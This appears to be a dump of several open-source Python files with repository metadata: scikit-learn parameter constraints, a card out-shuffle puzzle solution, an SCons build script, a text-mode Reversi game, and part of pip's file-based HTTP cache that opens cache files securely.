        # Must be a real number first: math.isnan rejects non-numerics.
        return isinstance(val, Real) and math.isnan(val)

    def __str__(self):
        return "numpy.nan"
class _PandasNAConstraint(_Constraint):
    """Constraint matching the ``pandas.NA`` missing-value indicator."""

    def is_satisfied_by(self, val):
        try:
            # Imported lazily: pandas is an optional dependency.
            import pandas as pd

            return isinstance(val, type(pd.NA)) and pd.isna(val)
        except ImportError:
            # Without pandas installed, nothing can be pd.NA.
            return False

    def __str__(self):
        return "pandas.NA"
class Options(_Constraint):
    """Constraint restricting a value to a finite set of instances of one type.

    Parameters
    ----------
    type : type
        The common type of the allowed values.

    options : set
        The set of valid scalars.

    deprecated : set or None, default=None
        A subset of the `options` to mark as deprecated in the string
        representation of the constraint.
    """

    def __init__(self, type, options, *, deprecated=None):
        super().__init__()
        self.type = type
        self.options = options
        self.deprecated = deprecated or set()

        # Deprecated entries must still be valid options.
        if self.deprecated - self.options:
            raise ValueError("The deprecated options must be a subset of the options.")

    def is_satisfied_by(self, val):
        return isinstance(val, self.type) and val in self.options

    def _mark_if_deprecated(self, option):
        """Render one option, appending a deprecation mark when needed."""
        if option in self.deprecated:
            return f"{option!r} (deprecated)"
        return f"{option!r}"

    def __str__(self):
        rendered = ", ".join(self._mark_if_deprecated(o) for o in self.options)
        return f"a {_type_name(self.type)} among {{{rendered}}}"
class StrOptions(Options):
    """Constraint representing a finite set of strings.

    Parameters
    ----------
    options : set of str
        The set of valid strings.

    deprecated : set of str or None, default=None
        A subset of the `options` to mark as deprecated in the string
        representation of the constraint.
    """

    def __init__(self, options, *, deprecated=None):
        # Delegates to Options with the element type pinned to str.
        super().__init__(type=str, options=options, deprecated=deprecated)
class Interval(_Constraint):
    """Constraint representing a typed interval.

    Parameters
    ----------
    type : {numbers.Integral, numbers.Real, RealNotInt}
        The set of numbers in which to set the interval.

        If RealNotInt, only reals that don't have the integer type
        are allowed. For example 1.0 is allowed but 1 is not.

    left : float or int or None
        The left bound of the interval. None means left bound is -∞.

    right : float, int or None
        The right bound of the interval. None means right bound is +∞.

    closed : {"left", "right", "both", "neither"}
        Whether the interval is open or closed. Possible choices are:

        - `"left"`: the interval is closed on the left and open on the right.
          It is equivalent to the interval `[ left, right )`.
        - `"right"`: the interval is closed on the right and open on the left.
          It is equivalent to the interval `( left, right ]`.
        - `"both"`: the interval is closed.
          It is equivalent to the interval `[ left, right ]`.
        - `"neither"`: the interval is open.
          It is equivalent to the interval `( left, right )`.

    Notes
    -----
    Setting a bound to `None` and setting the interval closed is valid. For instance,
    strictly speaking, `Interval(Real, 0, None, closed="both")` corresponds to
    `[0, +∞) U {+∞}`.
    """

    def __init__(self, type, left, right, *, closed):
        super().__init__()
        self.type = type
        self.left = left
        self.right = right
        self.closed = closed

        # Fail fast: a malformed constraint errors at declaration time,
        # not at first validation.
        self._check_params()

    def _check_params(self):
        # Validate the constraint's own arguments (not user parameter values).
        if self.type not in (Integral, Real, RealNotInt):
            raise ValueError(
                "type must be either numbers.Integral, numbers.Real or RealNotInt."
                f" Got {self.type} instead."
            )

        if self.closed not in ("left", "right", "both", "neither"):
            raise ValueError(
                "closed must be either 'left', 'right', 'both' or 'neither'. "
                f"Got {self.closed} instead."
            )

        if self.type is Integral:
            suffix = "for an interval over the integers."
            if self.left is not None and not isinstance(self.left, Integral):
                raise TypeError(f"Expecting left to be an int {suffix}")
            if self.right is not None and not isinstance(self.right, Integral):
                raise TypeError(f"Expecting right to be an int {suffix}")
            # An integer interval cannot include an infinite closed bound.
            if self.left is None and self.closed in ("left", "both"):
                raise ValueError(
                    f"left can't be None when closed == {self.closed} {suffix}"
                )
            if self.right is None and self.closed in ("right", "both"):
                raise ValueError(
                    f"right can't be None when closed == {self.closed} {suffix}"
                )
        else:
            if self.left is not None and not isinstance(self.left, Real):
                raise TypeError("Expecting left to be a real number.")
            if self.right is not None and not isinstance(self.right, Real):
                raise TypeError("Expecting right to be a real number.")

        if self.right is not None and self.left is not None and self.right <= self.left:
            raise ValueError(
                f"right can't be less than left. Got left={self.left} and "
                f"right={self.right}"
            )

    def __contains__(self, val):
        # NaN compares false against everything; reject it explicitly so it
        # is never considered inside any interval.
        if np.isnan(val):
            return False

        # Each comparator returns True when `val` VIOLATES the corresponding
        # bound (strict when the bound is included, non-strict otherwise).
        left_cmp = operator.lt if self.closed in ("left", "both") else operator.le
        right_cmp = operator.gt if self.closed in ("right", "both") else operator.ge

        left = -np.inf if self.left is None else self.left
        right = np.inf if self.right is None else self.right

        if left_cmp(val, left):
            return False
        if right_cmp(val, right):
            return False
        return True

    def is_satisfied_by(self, val):
        # Type check first: e.g. 1.0 never satisfies an Integral interval.
        if not isinstance(val, self.type):
            return False

        return val in self

    def __str__(self):
        type_str = "an int" if self.type is Integral else "a float"
        left_bracket = "[" if self.closed in ("left", "both") else "("
        left_bound = "-inf" if self.left is None else self.left
        right_bound = "inf" if self.right is None else self.right
        right_bracket = "]" if self.closed in ("right", "both") else ")"

        # better repr if the bounds were given as integers
        if not self.type == Integral and isinstance(self.left, Real):
            left_bound = float(left_bound)
        if not self.type == Integral and isinstance(self.right, Real):
            right_bound = float(right_bound)

        return (
            f"{type_str} in the range "
            f"{left_bracket}{left_bound}, {right_bound}{right_bracket}"
        )
class _ArrayLikes(_Constraint):
    """Constraint matching array-like values (excluding scalars)."""

    def is_satisfied_by(self, val):
        # Delegates to the shared validation helper.
        return _is_arraylike_not_scalar(val)

    def __str__(self):
        return "an array-like"
class _SparseMatrices(_Constraint):
    """Constraint matching scipy sparse matrices."""

    def is_satisfied_by(self, val):
        return issparse(val)

    def __str__(self):
        return "a sparse matrix"
class _Callables(_Constraint):
    """Constraint satisfied by any callable object."""

    def is_satisfied_by(self, val):
        # callable() covers functions, methods, and objects with __call__.
        return callable(val)

    def __str__(self):
        return "a callable"
class _RandomStates(_Constraint):
    """Constraint matching valid `random_state` values.

    Shorthand for the union of
    [Interval(Integral, 0, 2**32 - 1, closed="both"), np.random.RandomState, None].
    """

    def __init__(self):
        super().__init__()
        self._constraints = [
            Interval(Integral, 0, 2**32 - 1, closed="both"),
            _InstancesOf(np.random.RandomState),
            _NoneConstraint(),
        ]

    def is_satisfied_by(self, val):
        for constraint in self._constraints:
            if constraint.is_satisfied_by(val):
                return True
        return False

    def __str__(self):
        *head, last = self._constraints
        return f"{', '.join(str(c) for c in head)} or {last}"
class _Booleans(_Constraint):
    """Constraint matching boolean-like values.

    Shorthand for the union of [bool, np.bool_, Integral (deprecated)].
    """

    def __init__(self):
        super().__init__()
        self._constraints = [
            _InstancesOf(bool),
            _InstancesOf(np.bool_),
            _InstancesOf(Integral),
        ]

    def is_satisfied_by(self, val):
        # TODO(1.4) remove support for Integral.
        if isinstance(val, Integral) and not isinstance(val, bool):
            warnings.warn(
                "Passing an int for a boolean parameter is deprecated in version 1.2 "
                "and won't be supported anymore in version 1.4.",
                FutureWarning,
            )

        for constraint in self._constraints:
            if constraint.is_satisfied_by(val):
                return True
        return False

    def __str__(self):
        *head, last = self._constraints
        return f"{', '.join(str(c) for c in head)} or {last}"
class _VerboseHelper(_Constraint):
    """Constraint matching valid `verbose` values.

    Shorthand for the union of
    [Interval(Integral, 0, None, closed="left"), bool, numpy.bool_].
    """

    def __init__(self):
        super().__init__()
        self._constraints = [
            Interval(Integral, 0, None, closed="left"),
            _InstancesOf(bool),
            _InstancesOf(np.bool_),
        ]

    def is_satisfied_by(self, val):
        for constraint in self._constraints:
            if constraint.is_satisfied_by(val):
                return True
        return False

    def __str__(self):
        *head, last = self._constraints
        return f"{', '.join(str(c) for c in head)} or {last}"
class _MissingValues(_Constraint):
    """Constraint matching valid `missing_values` markers.

    Shorthand for the union of
    [Integral, Interval(Real, None, None, closed="both"), str, None,
    numpy.nan, pandas.NA].
    """

    def __init__(self):
        super().__init__()
        self._constraints = [
            _InstancesOf(Integral),
            # we use an interval of Real to ignore np.nan that has its own constraint
            Interval(Real, None, None, closed="both"),
            _InstancesOf(str),
            _NoneConstraint(),
            _NanConstraint(),
            _PandasNAConstraint(),
        ]

    def is_satisfied_by(self, val):
        for constraint in self._constraints:
            if constraint.is_satisfied_by(val):
                return True
        return False

    def __str__(self):
        *head, last = self._constraints
        return f"{', '.join(str(c) for c in head)} or {last}"
class HasMethods(_Constraint):
    """Constraint matching objects that expose specific methods.

    Useful for parameters following a protocol, where no affiliation to a
    specific module or class should be imposed.

    Parameters
    ----------
    methods : str or list of str
        The method(s) that the object is expected to expose.
    """

    @validate_params({"methods": [str, list]})
    def __init__(self, methods):
        super().__init__()
        # Normalize a single method name to a one-element list.
        self.methods = [methods] if isinstance(methods, str) else methods

    def is_satisfied_by(self, val):
        return all(callable(getattr(val, method, None)) for method in self.methods)

    def __str__(self):
        if len(self.methods) == 1:
            return f"an object implementing {self.methods[0]!r}"
        head = ", ".join(repr(m) for m in self.methods[:-1])
        return f"an object implementing {head} and {self.methods[-1]!r}"
class _IterablesNotString(_Constraint):
    """Constraint matching iterables, with strings explicitly excluded."""

    def is_satisfied_by(self, val):
        # Strings are iterable but are not accepted here.
        return isinstance(val, Iterable) and not isinstance(val, str)

    def __str__(self):
        return "an iterable"
class _CVObjects(_Constraint):
    """Constraint matching cross-validation specifiers.

    Shorthand for the union of
    [Interval(Integral, 2, None, closed="left"),
    HasMethods(["split", "get_n_splits"]), iterable (non-string), None].
    """

    def __init__(self):
        super().__init__()
        self._constraints = [
            Interval(Integral, 2, None, closed="left"),
            HasMethods(["split", "get_n_splits"]),
            _IterablesNotString(),
            _NoneConstraint(),
        ]

    def is_satisfied_by(self, val):
        for constraint in self._constraints:
            if constraint.is_satisfied_by(val):
                return True
        return False

    def __str__(self):
        *head, last = self._constraints
        return f"{', '.join(str(c) for c in head)} or {last}"
class Hidden:
    """Wrapper marking a constraint as internal-only.

    A hidden constraint is enforced like any other, but it is omitted from
    the error message presented to the user.

    Parameters
    ----------
    constraint : str or _Constraint instance
        The constraint to be used internally.
    """

    def __init__(self, constraint):
        self.constraint = constraint
def generate_invalid_param_val(constraint):
    """Return a value that does not satisfy the constraint.

    Raises a NotImplementedError if there exists no invalid value for this
    constraint.  This is only useful for testing purpose.

    Parameters
    ----------
    constraint : _Constraint instance
        The constraint to generate a value for.

    Returns
    -------
    val : object
        A value that does not satisfy the constraint.
    """
    if isinstance(constraint, StrOptions):
        # A string that is, by construction, none of the allowed options.
        return f"not {' or '.join(constraint.options)}"
    if isinstance(constraint, _MissingValues):
        # An array is not an accepted missing-value marker.
        return np.array([1, 2, 3])
    if isinstance(constraint, _VerboseHelper):
        # Verbosity levels must be non-negative.
        return -1
    if isinstance(constraint, HasMethods):
        # A fresh empty class instance exposes none of the required methods.
        return type("HasNotMethods", (), {})()
    if isinstance(constraint, _IterablesNotString):
        return "a string"
    if isinstance(constraint, _CVObjects):
        return "not a cv object"
    # NOTE: the Integral case must be tested before the Real one, since an
    # integer interval needs integer (not epsilon) steps past the bounds.
    if isinstance(constraint, Interval) and constraint.type is Integral:
        if constraint.left is not None:
            return constraint.left - 1
        if constraint.right is not None:
            return constraint.right + 1
        # There's no integer outside (-inf, +inf)
        raise NotImplementedError
    if isinstance(constraint, Interval) and constraint.type in (Real, RealNotInt):
        # Step just outside whichever finite bound exists.
        if constraint.left is not None:
            return constraint.left - 1e-6
        if constraint.right is not None:
            return constraint.right + 1e-6
        # bounds are -inf, +inf
        if constraint.closed in ("right", "neither"):
            return -np.inf
        if constraint.closed in ("left", "neither"):
            return np.inf
        # interval is [-inf, +inf]: nan is the only real value outside it
        return np.nan
    raise NotImplementedError
def generate_valid_param(constraint):
    """Return a value that does satisfy a constraint.

    This is only useful for testing purpose.

    Parameters
    ----------
    constraint : Constraint instance
        The constraint to generate a value for.

    Returns
    -------
    val : object
        A value that does satisfy the constraint.
    """
    if isinstance(constraint, _ArrayLikes):
        return np.array([1, 2, 3])
    if isinstance(constraint, _SparseMatrices):
        return csr_matrix([[0, 1], [1, 0]])
    if isinstance(constraint, _RandomStates):
        return np.random.RandomState(42)
    if isinstance(constraint, _Callables):
        return lambda x: x
    if isinstance(constraint, _NoneConstraint):
        return None
    if isinstance(constraint, _InstancesOf):
        if constraint.type is np.ndarray:
            # special case for ndarray since it can't be instantiated without arguments
            return np.array([1, 2, 3])
        if constraint.type in (Integral, Real):
            # special case for Integral and Real since they are abstract classes
            return 1
        # Otherwise assume the type has a zero-argument constructor.
        return constraint.type()
    if isinstance(constraint, _Booleans):
        return True
    if isinstance(constraint, _VerboseHelper):
        return 1
    if isinstance(constraint, _MissingValues):
        return np.nan
    if isinstance(constraint, HasMethods):
        # Build a throwaway class exposing each required method as a no-op.
        return type(
            "ValidHasMethods", (), {m: lambda self: None for m in constraint.methods}
        )()
    if isinstance(constraint, _IterablesNotString):
        return [1, 2, 3]
    if isinstance(constraint, _CVObjects):
        # An int >= 2 is a valid number of CV folds.
        return 5
    if isinstance(constraint, Options):  # includes StrOptions
        # Any of the declared options is valid; take the first one yielded.
        for option in constraint.options:
            return option
    if isinstance(constraint, Interval):
        interval = constraint
        # Pick a point guaranteed to lie inside the interval.
        if interval.left is None and interval.right is None:
            return 0
        elif interval.left is None:
            return interval.right - 1
        elif interval.right is None:
            return interval.left + 1
        else:
            if interval.type is Real:
                return (interval.left + interval.right) / 2
            else:
                return interval.left + 1
    raise ValueError(f"Unknown constraint type: {constraint}")
|
[
"[email protected]"
] | |
805e778f090eb8a26dac37e6725197e259091f56
|
f0d713996eb095bcdc701f3fab0a8110b8541cbb
|
/KLke67efuam6ajLrt_2.py
|
1dc365bb23d969b5f0f0d4e85f8e8ff90a1cf504
|
[] |
no_license
|
daniel-reich/turbo-robot
|
feda6c0523bb83ab8954b6d06302bfec5b16ebdf
|
a7a25c63097674c0a81675eed7e6b763785f1c41
|
refs/heads/main
| 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,765 |
py
|
"""
An **out-shuffle** , also known as an _out faro shuffle_ or a _perfect
shuffle_ , is a controlled method for shuffling playing cards. It is performed
by splitting the deck into two equal halves and interleaving them together
perfectly, with the condition that the top card of the deck remains in place.
Using an array to represent a deck of cards, an out-shuffle looks like:
[1, 2, 3, 4, 5, 6, 7, 8] ➞ [1, 5, 2, 6, 3, 7, 4, 8]
// Card 1 remains in the first position.
If we repeat the process, the deck eventually returns to original order.
Shuffle 1:
[1, 2, 3, 4, 5, 6, 7, 8] ➞ [1, 5, 2, 6, 3, 7, 4, 8]
Shuffle 2:
[1, 5, 2, 6, 3, 7, 4, 8] ➞ [1, 3, 5, 7, 2, 4, 6, 8]
Shuffle 3:
[1, 3, 5, 7, 2, 4, 6, 8] ➞ [1, 2, 3, 4, 5, 6, 7, 8]
// Back where we started.
Write a function that takes a positive even integer representing the number of
the cards in a deck, and returns the number of out-shuffles required to return
the deck to its original order.
### Examples
shuffle_count(8) ➞ 3
shuffle_count(14) ➞ 12
shuffle_count(52) ➞ 8
### Notes
* The number of cards is always **even** and **greater than one**. Thus, the smallest possible deck size is **two**.
* A **recursive** version of this challenge can be found via this [link](https://edabit.com/challenge/EXNAxFGgDDtE3SbQf).
"""
def shuffle_count(num):
    """Return the number of out-shuffles needed to restore a deck of ``num`` cards.

    An out-shuffle sends the card at 0-based position ``i`` to position
    ``2*i mod (num - 1)`` (first and last cards stay fixed), so the deck is
    back in order after ``k`` shuffles exactly when ``2**k == 1 (mod num-1)``.
    The answer is therefore the multiplicative order of 2 modulo ``num - 1``,
    computed here with O(1) work per shuffle instead of simulating whole
    O(num)-sized shuffles.

    Parameters
    ----------
    num : int
        Deck size; an even integer >= 2.

    Returns
    -------
    int
        Number of out-shuffles required to return the deck to original order.
    """
    modulus = num - 1
    if modulus == 1:
        # num == 2: a single out-shuffle leaves both cards in place.
        return 1
    count = 1
    residue = 2 % modulus
    while residue != 1:
        residue = residue * 2 % modulus
        count += 1
    return count
|
[
"[email protected]"
] | |
8e7ea66678d6525ed22d3dd5952486d8e44cd520
|
6923f79f1eaaba0ab28b25337ba6cb56be97d32d
|
/Fluid_Engine_Development_Doyub_Kim/external/src/pystring/SConscript
|
b6e8c9660762838555a40f518621f6873e7cf39a
|
[
"MIT"
] |
permissive
|
burakbayramli/books
|
9fe7ba0cabf06e113eb125d62fe16d4946f4a4f0
|
5e9a0e03aa7ddf5e5ddf89943ccc68d94b539e95
|
refs/heads/master
| 2023-08-17T05:31:08.885134 | 2023-08-14T10:05:37 | 2023-08-14T10:05:37 | 72,460,321 | 223 | 174 | null | 2022-10-24T12:15:06 | 2016-10-31T17:24:00 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 320 |
"""
Copyright (c) 2016 Doyub Kim
"""
Import('env', 'os', 'utils')
script_dir = os.path.dirname(File('SConscript').rfile().abspath)
lib_env = env.Clone()
lib_env.Append(CPPPATH = [os.path.join(script_dir, 'pystring'), script_dir])
lib = lib_env.Library('pystring', 'pystring/pystring.cpp')
Return('lib_env', 'lib')
|
[
"[email protected]"
] | ||
83f402a7ec1b6a4bf2e2ac6f13ff695c108fcf0c
|
44ff565bb1838a445e0d5a89ea3ca3e4b29b3686
|
/Python算法详解/第12章/Reversi.py
|
0a81667472893c1c0099a99a2e84e5b90021e743
|
[] |
no_license
|
huoweikong/python_pch_kiton
|
df3162aae397e82df9ef575f5f9d26039e5e036e
|
057cef1f34c76701840e7b8b46a5955b9f38b86b
|
refs/heads/master
| 2023-01-10T22:40:45.610986 | 2020-11-19T18:37:56 | 2020-11-19T18:37:56 | 313,897,428 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 9,262 |
py
|
# Reversegam: a clone of Othello/Reversi
import random
import sys
WIDTH = 8 # Board is 8 spaces wide
HEIGHT = 8 # Board is 8 spaces tall
def drawBoard(board):
    """Print the board (with 1-based coordinate labels) to stdout. Returns None."""
    print(' 12345678')
    print(' +--------+')
    for row in range(HEIGHT):
        cells = ''.join(board[col][row] for col in range(WIDTH))
        print('%s|%s|%s' % (row + 1, cells, row + 1))
    print(' +--------+')
    print(' 12345678')
def getNewBoard():
    """Create and return a brand-new, blank board data structure."""
    return [[' '] * HEIGHT for _ in range(WIDTH)]
def isValidMove(board, tile, xstart, ystart):
    """Check whether placing ``tile`` at (xstart, ystart) is a legal move.

    Returns False if the move is invalid; otherwise returns the list of
    [x, y] spaces that would flip to ``tile`` if the move were played.
    """
    # Bug fix: bounds must be checked BEFORE indexing the board.  The original
    # indexed first, which raises IndexError for coordinates >= 8 and silently
    # wraps around for negative coordinates.
    if not isOnBoard(xstart, ystart) or board[xstart][ystart] != ' ':
        return False
    if tile == 'X':
        otherTile = 'O'
    else:
        otherTile = 'X'
    tilesToFlip = []
    for xdirection, ydirection in [[0, 1], [1, 1], [1, 0], [1, -1], [0, -1], [-1, -1], [-1, 0], [-1, 1]]:
        x, y = xstart, ystart
        x += xdirection  # First step in the x direction
        y += ydirection  # First step in the y direction
        while isOnBoard(x, y) and board[x][y] == otherTile:
            # Keep advancing over the opponent's tiles in this direction.
            x += xdirection
            y += ydirection
        if isOnBoard(x, y) and board[x][y] == tile:
            # Bracketed by one of our tiles: walk back toward the start,
            # recording every opponent tile passed along the way.
            while True:
                x -= xdirection
                y -= ydirection
                if x == xstart and y == ystart:
                    break
                tilesToFlip.append([x, y])
    if len(tilesToFlip) == 0:  # No tiles would flip: not a valid move.
        return False
    return tilesToFlip
def isOnBoard(x, y):
    """Return True if (x, y) lies within the board bounds."""
    return 0 <= x < WIDTH and 0 <= y < HEIGHT
def getBoardWithValidMoves(board, tile):
    """Return a copy of the board with '.' marking each valid move for ``tile``."""
    hintBoard = getBoardCopy(board)
    for x, y in getValidMoves(hintBoard, tile):
        hintBoard[x][y] = '.'
    return hintBoard
def getValidMoves(board, tile):
    """Return the list of valid [x, y] moves for ``tile`` on this board."""
    return [
        [x, y]
        for x in range(WIDTH)
        for y in range(HEIGHT)
        if isValidMove(board, tile, x, y) != False
    ]
def getScoreOfBoard(board):
    """Count each player's tiles; return a dict with keys 'X' and 'O'."""
    scores = {'X': 0, 'O': 0}
    for x in range(WIDTH):
        for y in range(HEIGHT):
            tile = board[x][y]
            if tile in scores:
                scores[tile] += 1
    return scores
def enterPlayerTile():
    """Prompt until the player types X or O (case-insensitive).

    Returns a two-item list: the player's tile first, the computer's second.
    """
    tile = ''
    while tile not in ('X', 'O'):
        print('Do you want to be X or O?')
        tile = input().upper()
    return ['X', 'O'] if tile == 'X' else ['O', 'X']
def whoGoesFirst():
    """Randomly pick which side moves first."""
    return 'computer' if random.randint(0, 1) == 0 else 'player'
def makeMove(board, tile, xstart, ystart):
    """Place ``tile`` at (xstart, ystart) and flip all captured opponent pieces.

    Returns False if the move is invalid; True if it was played.
    """
    flips = isValidMove(board, tile, xstart, ystart)
    if flips == False:
        return False
    # Set the placed tile plus every captured space.
    for x, y in [[xstart, ystart]] + flips:
        board[x][y] = tile
    return True
def getBoardCopy(board):
    """Return a deep (row-wise) copy of the board list.

    Generalized: copies whatever dimensions ``board`` actually has instead of
    assuming the global WIDTH x HEIGHT grid, so it also works for boards of
    other sizes and no longer depends on module-level constants.
    """
    return [column[:] for column in board]
def isOnCorner(x, y):
    """Return True if (x, y) is one of the four corner spaces."""
    return x in (0, WIDTH - 1) and y in (0, HEIGHT - 1)
def getPlayerMove(board, playerTile):
    """Prompt the player for a move.

    Returns the move as a 0-based [x, y] list, or one of the strings
    'quit' / 'hints' for the corresponding meta-commands.
    """
    DIGITS1TO8 = '1 2 3 4 5 6 7 8'.split()
    while True:
        print('Enter your move, "quit" to end the game, or "hints" to toggle hints.')
        move = input().lower()
        if move == 'quit' or move == 'hints':
            return move
        if len(move) == 2 and move[0] in DIGITS1TO8 and move[1] in DIGITS1TO8:
            # Convert 1-based "column row" digits into 0-based indexes.
            x = int(move[0]) - 1
            y = int(move[1]) - 1
            if isValidMove(board, playerTile, x, y) == False:
                continue  # Well-formed input but an illegal move; re-prompt.
            else:
                break
        else:
            print('That is not a valid move. Enter the column (1-8) and then the row (1-8).')
            print('For example, 81 will move on the top-right corner.')
    return [x, y]
def getComputerMove(board, computerTile):
    """Choose the computer's move and return it as an [x, y] list.

    Strategy: take a corner when available; otherwise take the move that
    yields the highest score (ties resolved by the initial random shuffle).
    Returns None when there are no valid moves; previously that case crashed
    with NameError on an unbound ``bestMove`` (callers were expected to
    pre-check, but the guard makes the function safe on its own).
    """
    possibleMoves = getValidMoves(board, computerTile)
    if not possibleMoves:
        return None
    random.shuffle(possibleMoves)  # randomize the order of the moves
    # Always go for a corner if available.
    for x, y in possibleMoves:
        if isOnCorner(x, y):
            return [x, y]
    # Find the highest-scoring move possible.
    bestScore = -1
    for x, y in possibleMoves:
        boardCopy = getBoardCopy(board)
        makeMove(boardCopy, computerTile, x, y)
        score = getScoreOfBoard(boardCopy)[computerTile]
        if score > bestScore:
            bestMove = [x, y]
            bestScore = score
    return bestMove
def printScore(board, playerTile, computerTile):
    """Print the current score for both players."""
    scores = getScoreOfBoard(board)
    line = 'You: %s points. Computer: %s points.' % (
        scores[playerTile], scores[computerTile])
    print(line)
def playGame(playerTile, computerTile):
    """Play one full game; return the final board when neither side can move.

    May terminate the whole program via sys.exit() if the player types 'quit'.
    """
    showHints = False
    turn = whoGoesFirst()
    print('The ' + turn + ' will go first.')
    # Clear the board and place starting pieces.
    board = getNewBoard()
    board[3][3] = 'X'
    board[3][4] = 'O'
    board[4][3] = 'O'
    board[4][4] = 'X'
    while True:
        playerValidMoves = getValidMoves(board, playerTile)
        computerValidMoves = getValidMoves(board, computerTile)
        if playerValidMoves == [] and computerValidMoves == []:
            return board  # No one can move, so end the game.
        elif turn == 'player':  # Player's turn
            if playerValidMoves != []:
                if showHints:
                    validMovesBoard = getBoardWithValidMoves(board, playerTile)
                    drawBoard(validMovesBoard)
                else:
                    drawBoard(board)
                printScore(board, playerTile, computerTile)
                move = getPlayerMove(board, playerTile)
                if move == 'quit':
                    print('Thanks for playing!')
                    sys.exit()  # Terminate the program.
                elif move == 'hints':
                    showHints = not showHints
                    continue
                else:
                    makeMove(board, playerTile, move[0], move[1])
            # The turn passes even when the player had no valid move.
            turn = 'computer'
        elif turn == 'computer':  # Computer's turn
            if computerValidMoves != []:
                drawBoard(board)
                printScore(board, playerTile, computerTile)
                input('Press Enter to see the computer\'s move.')
                move = getComputerMove(board, computerTile)
                makeMove(board, computerTile, move[0], move[1])
            # Likewise, the turn passes even if the computer could not move.
            turn = 'player'
# --- Main program: play repeated games until the player declines another. ---
print('Welcome to Reversegam!')
playerTile, computerTile = enterPlayerTile()
while True:
    finalBoard = playGame(playerTile, computerTile)
    # Display the final score.
    drawBoard(finalBoard)
    scores = getScoreOfBoard(finalBoard)
    print('X scored %s points. O scored %s points.' % (scores['X'], scores['O']))
    if scores[playerTile] > scores[computerTile]:
        print('You beat the computer by %s points! Congratulations!' % (scores[playerTile] - scores[computerTile]))
    elif scores[playerTile] < scores[computerTile]:
        print('You lost. The computer beat you by %s points.' % (scores[computerTile] - scores[playerTile]))
    else:
        print('The game was a tie!')
    print('Do you want to play again? (yes or no)')
    # Any answer not starting with 'y' ends the session.
    if not input().lower().startswith('y'):
        break
|
[
"[email protected]"
] | |
1d443fcd8a68dc9c0124dcbff16c16d020b695ab
|
9e549ee54faa8b037f90eac8ecb36f853e460e5e
|
/venv/lib/python3.6/site-packages/pip/_vendor/cachecontrol/caches/file_cache.py
|
10f2f222d46d9d3c3a69f254940903cb2be1c86b
|
[
"MIT"
] |
permissive
|
aitoehigie/britecore_flask
|
e8df68e71dd0eac980a7de8c0f20b5a5a16979fe
|
eef1873dbe6b2cc21f770bc6dec783007ae4493b
|
refs/heads/master
| 2022-12-09T22:07:45.930238 | 2019-05-15T04:10:37 | 2019-05-15T04:10:37 | 177,354,667 | 0 | 0 |
MIT
| 2022-12-08T04:54:09 | 2019-03-24T00:38:20 |
Python
|
UTF-8
|
Python
| false | false | 4,176 |
py
|
import hashlib
import os
from textwrap import dedent
from ..cache import BaseCache
from ..controller import CacheController
try:
    FileNotFoundError
except NameError:
    # Python 2 has no FileNotFoundError; fall back to the broader OS errors
    # so the except clauses below behave the same on both major versions.
    FileNotFoundError = (IOError, OSError)
def _secure_open_write(filename, fmode):
    """Securely open *filename* for binary writing with permissions *fmode*.

    Any existing file is removed first and the new one is created with
    O_CREAT | O_EXCL (and O_NOFOLLOW where available), so the open fails
    instead of following an attacker's symlink planted between the delete
    and the create.  Returns a binary file object wrapping the descriptor.
    """
    # We only want to write to this file, so open it in write only mode
    flags = os.O_WRONLY
    # os.O_CREAT | os.O_EXCL will fail if the file already exists, so we only
    # will open *new* files.
    # We specify this because we want to ensure that the mode we pass is the
    # mode of the file.
    flags |= os.O_CREAT | os.O_EXCL
    # Do not follow symlinks to prevent someone from making a symlink that
    # we follow and insecurely open a cache file.
    if hasattr(os, "O_NOFOLLOW"):
        flags |= os.O_NOFOLLOW
    # On Windows we'll mark this file as binary
    if hasattr(os, "O_BINARY"):
        flags |= os.O_BINARY
    # Before we open our file, we want to delete any existing file that is
    # there
    try:
        os.remove(filename)
    except (IOError, OSError):
        # The file must not exist already, so we can just skip ahead to opening
        pass
    # Open our file, the use of os.O_CREAT | os.O_EXCL will ensure that if a
    # race condition happens between the os.remove and this line, that an
    # error will be raised. Because we utilize a lockfile this should only
    # happen if someone is attempting to attack us.
    fd = os.open(filename, flags, fmode)
    try:
        return os.fdopen(fd, "wb")
    except:
        # An error occurred wrapping our FD in a file object
        os.close(fd)
        raise
class FileCache(BaseCache):
    """CacheControl cache backend storing each entry as a file on disk.

    Keys are SHA-224 hashed and sharded across subdirectories; writes are
    serialized with a lock file and go through _secure_open_write to avoid
    symlink attacks.
    """
    def __init__(
        self,
        directory,
        forever=False,
        filemode=0o0600,
        dirmode=0o0700,
        use_dir_lock=None,
        lock_class=None,
    ):
        # use_dir_lock and lock_class are two ways of picking the locking
        # strategy; supplying both is ambiguous.
        if use_dir_lock is not None and lock_class is not None:
            raise ValueError("Cannot use use_dir_lock and lock_class together")
        try:
            from pip._vendor.lockfile import LockFile
            from pip._vendor.lockfile.mkdirlockfile import MkdirLockFile
        except ImportError:
            notice = dedent(
                """
            NOTE: In order to use the FileCache you must have
            lockfile installed. You can install it via pip:
              pip install lockfile
            """
            )
            raise ImportError(notice)
        else:
            if use_dir_lock:
                lock_class = MkdirLockFile
            elif lock_class is None:
                lock_class = LockFile
        self.directory = directory
        self.forever = forever      # if True, delete() leaves files in place
        self.filemode = filemode    # permission bits for cache files
        self.dirmode = dirmode      # permission bits for created directories
        self.lock_class = lock_class
    @staticmethod
    def encode(x):
        # Hash keys so arbitrary URLs become safe, fixed-length file names.
        return hashlib.sha224(x.encode()).hexdigest()
    def _fn(self, name):
        # NOTE: This method should not change as some may depend on it.
        # See: https://github.com/ionrock/cachecontrol/issues/63
        hashed = self.encode(name)
        # Shard by the first five hex chars to keep directories small.
        parts = list(hashed[:5]) + [hashed]
        return os.path.join(self.directory, *parts)
    def get(self, key):
        """Return the cached bytes for *key*, or None if absent."""
        name = self._fn(key)
        try:
            with open(name, "rb") as fh:
                return fh.read()
        except FileNotFoundError:
            return None
    def set(self, key, value):
        """Write *value* (bytes) for *key*, creating directories as needed."""
        name = self._fn(key)
        # Make sure the directory exists
        try:
            os.makedirs(os.path.dirname(name), self.dirmode)
        except (IOError, OSError):
            # Directory already exists (or creation raced); proceed anyway.
            pass
        with self.lock_class(name) as lock:
            # Write our actual file
            with _secure_open_write(lock.path, self.filemode) as fh:
                fh.write(value)
    def delete(self, key):
        """Remove the cache entry for *key* unless ``forever`` is set."""
        name = self._fn(key)
        if not self.forever:
            try:
                os.remove(name)
